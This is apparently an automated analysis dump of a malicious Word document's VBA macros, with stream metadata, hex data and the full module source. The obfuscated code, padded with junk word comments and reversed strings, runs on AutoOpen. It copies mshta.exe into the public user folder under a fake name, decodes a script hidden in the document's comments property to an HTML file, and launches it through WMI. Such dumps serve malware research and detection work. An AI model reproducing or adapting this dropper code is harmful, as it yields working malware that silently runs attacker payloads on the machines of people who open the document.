Data Raw:	01 16 03 00 06 00 01 00 00 34 03 00 00 e4 00 00 00 ea 01 00 00 62 03 00 00 70 03 00 00 c4 03 00 00 00 00 00 00 01 00 00 00 0e 35 d7 f8 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 73 04 ec 3a 99 d0 5c 4c bb d7 23 59 2a 88 09 7f 14 fb 67 20 7e 8f de 4c 81 6f 96 90 b4 fc f3 9f 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Creatable
VB_Name
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
"ThisDocument"

VBA Code

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

VBA File Name: a7A5m.bas, Stream Size: 5178

General
Stream Path:	VBA/a7A5m
VBA File Name:	a7A5m.bas
Stream Size:	5178
Data ASCII:	. . . . . . . . . j . . . . . . . . . . . . . . . q . . . ] . . . . . . . . . . . . 5 > Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 6a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 71 03 00 00 5d 0e 00 00 00 00 00 00 01 00 00 00 0e 35 3e 51 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
joins
effigy
photo
maidenhead
torah
imprint
co-operative
unfavorable
Collects
Public
Diagram
aSGxU
Makeup
father
abhorred
controls
Cutting
unpropitious
minerva
Training
Adventures
unveil
Mysimon
Replace(aPENSZ,
slanderous
webcast
savoury
nucleus
liberia
footstool
Adroit
nutmeg
greenish
inter
adHaPl
Hallow
warner
manger
ethical
Since
pickled
Routing
Sniff
Giants
Nickel
seventy-four
fellowship
shadow
Maudlin
stefan
Tribal
tabooed
akSqK(aPENSZ)
expire
along
vaccine
reaction
Rancid
patricia
lackey
coxcomb
Workflow
axIuO
succeed
daisy
syria
Receptacle
Defraud
Knowledge
Contacts
Sorcery
transit
undersigned
leniency
sacrilegious
aYKyQ
dearborn
insulation
detecting
cloud
Glucose
willy
wealth
probity
exhort
Accelerated
ballast
Articulated
transverse
azUoN
Outcome
Specifies
graphic
brandishing
Attribute
gamespot
rectangular
patients
awAlq()
tumults
Enemies
Basketball
VB_Name
Gloating
(axSiN)
Issue
counterfeit
Function
Retrospect
unadulterated
comfort
hybrid
Munich
brandon
delay
located
actors
commentary
akSqK
cubic
stacy
photographers
Airport
characters
dappled
chris
mangrove
knack
Generates
statute
Attorney
coupling
navel
Pyramid
steady
bakery
Boolean
Terrace
Verzeichnis
turnpike

VBA Code

Attribute VB_Name = "a7A5m"
Function aSGxU(aie8CL)
' Attorney delay nw ballast
' Soot tyre counterfeit
' Collects patients steady
' Knowledge dappled jvc
' Basketball effigy ethical expire
' Outcome imprint characters wc mangrove unfavorable ween
' Mysimon liberia
' Accelerated roth cubic daisy unadulterated
' Wr actors manger
' Sniff commentary cede
' Lay abhorred turnpike ag cult
' Terrace minerva
' Diagram wealth slanderous mae
' Boolean greenish along
' Retrospect located transverse lackey weld
' Issue savoury bakery syria
' Giants rectangular spas
' Cutting
' Adroit knack arg gone do leniency
' Contacts goto head sacrilegious
' Routing chris
' Airport seventy-four gens cz
' Gloating photographers statute exhort ir
' Makeup nutmeg sims coupling reaction roth webcast
' Suck op. father
' Glucose unpropitious
' Flea
' Maudlin co-operative rib controls
' Specifies comfort tabooed warner
' Sorcery succeed po graphic
For a6mGn = Len(aie8CL) To 1 Step -1
azUoN = Mid(aie8CL, a6mGn, 1)
adHaPl = adHaPl & azUoN
Next
aSGxU = adHaPl
End Function
Public Function akSqK(aPENSZ)
akSqK = Replace(aPENSZ, a7odJ, "")
End Function
Sub awAlq()
' Laud footstool undersigned
' Tribal joins probity fellowship inter maidenhead
' Generates
' Army pup
aYKyQ
' Verzeichnis
' Enemies hybrid
' Adventures torah
' Foam willy gamespot patricia
axIuO
' Defraud photo dearborn shadow tumults
' Rancid kirk knack cloud
' Bush vaccine insulation
' Pyramid unveil crew mem brandishing
' Articulated pickled stacy brandon transit
' Munich ira coxcomb
' Nickel stefan
' Hallow
' Workflow
' Training nucleus
' Receptacle detecting navel
' Since
agPh8 = akSqK(aSGxU(a3IdJQ))
CreateObject(agPh8).create (axSiN)
End Sub

VBA File Name: aH8xms.bas, Stream Size: 863

General
Stream Path:	VBA/aH8xms
VBA File Name:	aH8xms.bas
Stream Size:	863
Data ASCII:	. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 11 03 00 00 00 00 00 00 01 00 00 00 0e 35 b2 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
awAlq
Attribute
AutoOpen()
VB_Name

VBA Code
`Attribute VB_Name = "aH8xms" Sub AutoOpen() awAlq End Sub`

VBA File Name: aIsb7.bas, Stream Size: 5040

General
Stream Path:	VBA/aIsb7
VBA File Name:	aIsb7.bas
Stream Size:	5040
Data ASCII:	. . . . . . . . . : . . . . . . . . . . . . . . . A . . . 1 . . . . . . . . . . . . 5 . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 3a 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 41 06 00 00 31 0f 00 00 00 00 00 00 01 00 00 00 0e 35 df 77 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Blackmail
developer
valuation
plume
aMslO(aucpr)
amZcqK
Berkeley
plenipotentiary
translations
aYzBn
roundabout
aVzRp()
(akSqK(aucpr))
Pronoun
aCqnt
positions
teams
purveyor
arthur
louis
soviet
Tatiana
axSiN
motherboard
numeric
Idiom
perspective
dialectic
shallows
gazette
Discovery
felony
unconvinced
roller
Proven
medicare
ElseIf
clime
cartwright
importunate
moiety
guess
Bulldog
adeKx
Bereavement
asses
participated
Waylaid
confiscate
grandchildren
Barely
axSiN()
Shutter
Coiled
realty
compute
Precedence
vapid
Attribute
handcuffs
aaqRT
transparency
specialized
propaganda
VB_Name
calvin
telephony
everyday
Function
baste
demesne
switching
Springer
Modes
Luggage
Avant
catalog
Milky
hearthstone
tracy
expand
aMslO
Johns
sunset
requires

VBA Code

Attribute VB_Name = "aIsb7"
Function aCqnt(ayM1o)
' Precedence sur soviet wall foal importunate vapid
' Springer telephony specialized moiety catalog
' Blackmail
aCqnt = akSqK(ayM1o)
End Function
Function aMslO(aucpr)
' Proven luis felony
' Waylaid compute clime fit
' None numeric expand
' Barely asses teams lil
aMslO = (akSqK(aucpr))
End Function
Function ayUxA2(aT2PX)
' Bird
' Bereavement participated positions
' Veal shallows cartwright louis confiscate sunset
' Berkeley able transparency perspective requires hearthstone
ayUxA2 = (akSqK(aT2PX))
End Function
Function axSiN()
adeKx = aMslO(adkJvD(1))
aaqRT = ayUxA2(adkJvD(2))
axSiN = adeKx & " " & aaqRT
End Function
Sub aVzRp()
acIr6u = aCqnt(adkJvD(0))
adeKx = aMslO(adkJvD(1))
amZcqK acIr6u, adeKx
End Sub
Function a3ox6(a48o6)
a3ox6 = a48o6 + -158 + 184
End Function
Function a3eJx(aFP9Ao)
If aFP9Ao = 0 Then
a3eJx = -6824 + 6825
' Pronoun
' Veal guess roundabout
' Discovery
' Modes arthur
' Bulldog tracy
' Johns gulp rice
' Sync motherboard nuts lens propaganda realty
' Idiom unconvinced handcuffs tcp
' Shutter roller valuation sen
' Coop medicare cons grandchildren
' Tatiana kite everyday dialectic switching calvin baste
' Milky plume demesne
' Coiled purveyor translations gazette plenipotentiary
' Luggage developer baby
' Avant
ElseIf aFP9Ao = 5 Then
a3eJx = -63 + 160
Else
a3eJx = 1049 - 25
End If
End Function
Function aYzBn(a48o6, a20NB)
aYzBn = a48o6 - a20NB
End Function
Function a9vceZ(a48o6)
a9vceZ = Chr(a48o6)
End Function

VBA File Name: aOMv0.bas, Stream Size: 3156

General
Stream Path:	VBA/aOMv0
VBA File Name:	aOMv0.bas
Stream Size:	3156
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 k > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 11 09 00 00 00 00 00 00 01 00 00 00 0e 35 6b 3e 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
causes
anFJy
exclusively
Truly
Browser
aYzBn(aDKIk,
smell
Searched
adBRr(anFJy)
Surrounding
recommendations
nazarene
Constitutes
proteins
delegation
String
aMnjk
commentator
zoological
trunk
Juvenile
pearly
ElseIf
Insider
learning
Oreilly
Asc(aMnjk)
Treasurer
alfred
aDKIk
Integer
limousine
Alexander
Respiratory
aJjwu)
abomination
delayed
Memoirs
Attribute
ascendancy
acclaim
Imprecation
VB_Name
wampum
Etymology
undeceive
Function
priory
humanities
relatives
sufficiency
aJjwu
unless
persons
(aDKIk
elusive
Stumped
turnpike

VBA Code

Attribute VB_Name = "aOMv0"
Function a6sXJE(a2cCM) As String
Dim as6h1W As Long
Dim aDKIk As Integer
Dim aJjwu As Integer
For as6h1W = 1 To VBA.Len(a2cCM) Step 1
' Stumped deck
' Juvenile abomination proteins
' Browser land ascendancy
' Truly
aJjwu = 0
' Tier alfred wampum delayed
' Searched zoological recommendations
' Gi
aMnjk = Mid(a2cCM, as6h1W, 1)
aDKIk = Asc(aMnjk)
' Memoirs relatives unless persons
' Oreilly turnpike
' Constitutes acclaim aura causes nor learning
' Alexander undeceive limousine tiny exclusively delegation
If (aDKIk > 64 And aDKIk < 91) Or (aDKIk > 96 And aDKIk < 123) Then
aJjwu = as8nLc
aDKIk = aYzBn(aDKIk, aJjwu)
' Respiratory sufficiency
' Imprecation priory pearly trunk
' Insider
' Egg
If aDKIk < a3eJx(5) And aDKIk > 83 Then
aDKIk = a3ox6(aDKIk)
ElseIf aDKIk < 128 - 63 Then
aDKIk = a3ox6(aDKIk)
End If
End If
anFJy = a9vceZ(aDKIk)
Mid$(a2cCM, as6h1W, 1) = adBRr(anFJy)
Next
' Surrounding fl humanities
' Num
' Etymology elusive md smell nazarene
' Treasurer commentator
a6sXJE = a2cCM
End Function

VBA File Name: aRZcbw.bas, Stream Size: 4810

General
Stream Path:	VBA/aRZcbw
VBA File Name:	aRZcbw.bas
Stream Size:	4810
Data ASCII:	. . . . . . . . . b . . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . 5 . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 62 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 69 04 00 00 b1 0d 00 00 00 00 00 00 01 00 00 00 0e 35 b6 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
uninterested
determinate
Const
serenade
fraser
unreliable
Public
Contacting
adolescence
Kinswoman
wickedly
walnut
blots
undivided
vociferous
Antigua
Librarian
Indolence
procedures
encounter
Campaign
riven
Defined
belfast
tradespeople
dizziness
Abstention
Terrorist
Maidenhead
Anniversary
phosphoric
dialectic
enemies
Dentists
String
Upskirt
Nearly
undecided
affordable
timeline
Obviously
selective
offset
const
restrictions
would
shove
nomenclature
axIuO()
Gentle
Choosing
Maine
gamma
consulting
strumpet
schooling
Metallic
dietary
stumble
landscape
Straightforward
prove
deuteronomy
ravage
Ecological
brazilian
Integer
jerky
adroitly
walter
daughter-in-law
aVzRp
shell
supporters
catering
magnanimous
Stylish
haven
assets
boarding
holland
washington
"aRZcbw"
Attribute
abortion
economies
compensation
Receptor
latch
Dysentery
Variety
expanding
VB_Name
Esquire
Fisting
aYKyQ()
collapse
Function
completeness
cambodia
branch
elliptical
Entrust
reporting
demanding
consolidation
sceptic
priced
Gamma
Sensuality
unload
cover
brooded
strings

VBA Code

Attribute VB_Name = "aRZcbw"
Public Const a3IdJQ As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const a7odJ As String = ")"
Public Const as8nLc As Integer = 30602 / 2354
Function aG87E()
' Swum fraser washington
' Choosing vociferous
' Fisting jack
' Straightforward holland
End Function
Sub a7zcHr(aFtIw)
' Terrorist
' Kinswoman cambodia
' Abstention dell
' Maine determinate reporting strings magnanimous
' Doo catering serenade completeness cover
' Sensuality restrictions wickedly gamma
' Esquire unload
' Seal procedures daughter-in-law rain
' Ecological bier
' Receptor adroitly prove shell stumble dialectic latch sceptic
' Metallic brazilian expanding adolescence
' Obviously enemies jerky abortion
' Stylish demanding dietary
' Nearly deuteronomy
' Dory undecided walter uninterested landscape
' Gamma priced dizziness elliptical phosphoric branch
' Dentists consulting haven pies
' Lose supporters tradespeople blots
' Contacting
' Indolence strumpet shove
End Sub
Function a8qpd(afAV8)
' Gentle offset brooded boarding ravage assets
' Upskirt
' Entrust
' Campaign walnut timeline compensation view
' Maidenhead
' Variety riven undivided
' Anniversary fete
' Antigua collapse consolidation economies schooling
a8qpd = ActiveDocument.BuiltInDocumentProperties(afAV8)
End Function
Public Sub aYKyQ()
' Dysentery const selective open affordable encounter
' Defined would nomenclature unreliable
' Librarian belfast
If -342 + 406 < 164 Then
Call aVzRp
End If
End Sub
Public Sub axIuO()
If -342 + 406 < 164 Then
Call ah28l
End If
End Sub

VBA File Name: abh0Rg.bas, Stream Size: 4574

General
Stream Path:	VBA/abh0Rg
VBA File Name:	abh0Rg.bas
Stream Size:	4574
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 ca 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff d1 03 00 00 e1 0c 00 00 00 00 00 00 01 00 00 00 0e 35 f9 c7 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
seasonal
pointed
Trains
Cancelled
theaters
swain
fullness
Public
sulky
referring
explain
compost
Aquarium
bullet
digit
downpour
Changelog
alabaster
denounce
Candy
self-evident
Homesickness
Machinist
statistical
Primacy
FreeFile
Love-making
Truism
companies
mother-in-law
Competition
subway
analytical
walrus
greenhouse
Flaccid
Webshots
Tress
tricolor
pacific
pretension
radius
Print
Drawn
FileNumber
Breakdown
diffidence
Biology
aicyF
illusory
wikipedia
poison
adBRr
dutch
suggesting
participation
Plaza
Sanity
Gaoler
impromptu
isthmus
Amber
sender
urges
changes
#FileNumber
confidentiality
tunisia
liqueur
Simulated
coding
venues
seashore
reservation
lighthouse
swimmer
Arising
aicyF)
lambent
sloped
shortening
fahrenheit
transcendent
#FileNumber,
flexible
Winsome
Georgia
option
Forests
lazarus
labourer
bukkake
Grenada
Surplus
Attribute
avhZYf
aVOhvn
Syntax
Close
devious
engineers
cleaner
VB_Name
lichen
Outwards
stubbornly
proceeds
trusted
Function
belle
depth
highlighted
FileCopy
louisville
Inconsistency
ungracious
opposite
adBRr(avhZYf)
disagree
Indisputable
Output
classroom
notch
Abandons
allegorical
Overhung
eddies
Adultery
Intact

VBA Code

Attribute VB_Name = "abh0Rg"
Public Function aX4od(aVOhvn, aA5aKj)
' Primacy
' Love-making walrus argo referring lighthouse pretension
' Tress una explain subway louisville
' Aquarium allegorical
' Inconsistency option
' Georgia flexible theaters
' Gaoler stubbornly labourer rolf
' Machinist tang lichen illusory
' Competition eddies muff cant
' Overhung
' Forests poison ex
' Indisputable liqueur
' Grenada
' Cancelled participation self-evident wikipedia highlighted opposite notch
' Sanity suggesting transcendent
' Webshots tricolor ungracious
' Changelog tunisia classroom diffidence
' Candy pointed companies
' Chen engineers
' Outwards coding joe
' Truism fahrenheit downpour isthmus
' Intact digit cleaner fullness lambent
' Breakdown fear
FileNumber = FreeFile
Open aVOhvn For Output As #FileNumber
' Eng urges bukkake
' Plaza confidentiality bunk
' Abandons swimmer alabaster
' Take swain reservation impromptu seasonal proceeds
Print #FileNumber, aA5aKj
' Biology bus disagree statistical depth compost
' Surplus greenhouse denounce
' Syntax
' Homesickness devious
Close #FileNumber
End Function
Sub amZcqK(aH6Oa, aicyF)
' Simulated pacific belle changes
' Winsome radius dutch
' Adultery soft mother-in-law trusted
' Sod lazarus gg analytical
' Amber
' Deep
' Drawn shortening
' Trains seashore venues sock sender prev
' Arising
' Flaccid sloped bullet sulky
FileCopy aH6Oa, aicyF
End Sub
Function adBRr(avhZYf)
adBRr = avhZYf
End Function

VBA File Name: adGbPA.bas, Stream Size: 4586

General
Stream Path:	VBA/adGbPA
VBA File Name:	adGbPA.bas
Stream Size:	4586
Data ASCII:	. . . . . . . . . J . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . 5 . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 4a 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 51 03 00 00 f5 0c 00 00 00 00 00 00 01 00 00 00 0e 35 ee 60 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
intervals
octagonal
neigh
signs
astrology
legitimately
tittle
southwest
Technique
Matins
rejoin
Mephistopheles
intimidation
Burdensome
Responsibility
syllogism
Adobe
pounds
patrick
concave
Bequeath
Types
hesse
Select
pragmatic
excavation
magnificent
Vishnu
abolitionist
estimated
occurrence
Vassal
adkJvD
Armenia
Sanctified
dunbar
Systematically
component
Departments
modular
lucrative
Stating
Attica
derivation
attending
Bouquet
losses
leave-taking
Screens
fleshy
primal
Hybrid
)o)l)l)e)h)"),
Redden
utility
clustering
Unless
athens
totality
"adGbPA"
inferno
recurring
expiring
Sampson
languidly
Marrow
trojan
Attribute
Counsellor
Receipt
headers
Inactive
Sundown
lingo
charlotte
thirty-nine
aGSfMv()
VB_Name
Terminal
overran
Wicked
Function
silhouette
recovery
Mario
Infringement
Ticket
pichunter
chemist
Blue-black
brainless
cliff
complacent
compendium
aGSfMv
defilement
annuity
register
foundry
Displacement
remonstrate

VBA Code

Attribute VB_Name = "adGbPA"
Function aGSfMv()
aGSfMv = VBA.Split(aSGxU("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function adkJvD(ah7ovz)
' Wicked magnificent lingo component
' Blue-black cliff compendium chemist silhouette
' Departments
' Matins hunt octagonal lens inferno
apa2Q = aGSfMv()
' Sundown modular kits estimated
' Redden cl losses
' Miss
' Terminal
' Sail
' Burdensome pragmatic fleshy complacent
' Attica utility
' Armenia remonstrate clustering southwest overran
' Displacement excavation attending signs root annuity
' Vassal
' Stating derivation
' Responsibility defilement curd hesse athens
' Bequeath
' Ticket
' Receipt patrick
' Counsellor recovery abolitionist
' Bouquet headers
' Adobe
' Vs. register
Select Case ah7ovz
' Hybrid dung ewe
' Sanctified rejoin primal
' Systematically languidly
' Technique thirty-nine pounds legitimately
Case 0:
' Screens
' Saga foundry neigh pichunter dunbar tale syllogism
' Marrow trojan astrology row
' Inactive
adkJvD = apa2Q(1)
' Unless intervals
' Sampson lucrative
' Vishnu tittle charlotte
' Infringement recurring leave-taking
Case 1:
adkJvD = apa2Q(2)
' Mario
' Types expiring brainless occurrence mf intimidation
' Mephistopheles concave totality
Case 2:
adkJvD = apa2Q(3)
End Select
End Function
Sub ah28l()
aocn4g = ayUxA2(adkJvD(2))
aX4od aocn4g, a6sXJE(a8qpd("comments"))
End Sub

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 618

General
Stream Path:	PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	618
Entropy:	5.34267626544
Base64 Encoded:	True
Data ASCII:	I D = " { 8 6 2 6 2 4 0 6 - 3 0 4 D - 4 E F A - A 4 4 C - C 5 5 4 C 4 7 8 6 1 3 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . M o d u l e = a H 8 x m s . . M o d u l e = a R Z c b w . . M o d u l e = a b h 0 R g . . M o d u l e = a 7 A 5 m . . M o d u l e = a d G b P A . . M o d u l e = a I s b 7 . . M o d u l e = a O M v 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 C
Data Raw:	49 44 3d 22 7b 38 36 32 36 32 34 30 36 2d 33 30 34 44 2d 34 45 46 41 2d 41 34 34 43 2d 43 35 35 34 43 34 37 38 36 31 33 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 61 48 38 78 6d 73 0d 0a 4d 6f 64 75 6c 65 3d 61 52 5a 63 62 77 0d 0a 4d 6f 64 75 6c 65 3d 61 62 68 30 52 67 0d 0a 4d 6f 64 75

Stream Path: PROJECTwm, File Type: data, Stream Size: 179

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	179
Entropy:	3.66892704793
Base64 Encoded:	True
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . a H 8 x m s . a . H . 8 . x . m . s . . . a R Z c b w . a . R . Z . c . b . w . . . a b h 0 R g . a . b . h . 0 . R . g . . . a 7 A 5 m . a . 7 . A . 5 . m . . . a d G b P A . a . d . G . b . P . A . . . a I s b 7 . a . I . s . b . 7 . . . a O M v 0 . a . O . M . v . 0 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 61 48 38 78 6d 73 00 61 00 48 00 38 00 78 00 6d 00 73 00 00 00 61 52 5a 63 62 77 00 61 00 52 00 5a 00 63 00 62 00 77 00 00 00 61 62 68 30 52 67 00 61 00 62 00 68 00 30 00 52 00 67 00 00 00 61 37 41 35 6d 00 61 00 37 00 41 00 35 00 6d 00 00 00 61 64 47 62 50 41 00 61

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4172

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4172
Entropy:	4.76403916663
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2119

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2119
Entropy:	3.47748136877
Base64 Encoded:	True
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . A . . . . . . V H . . . . . . . . . . .
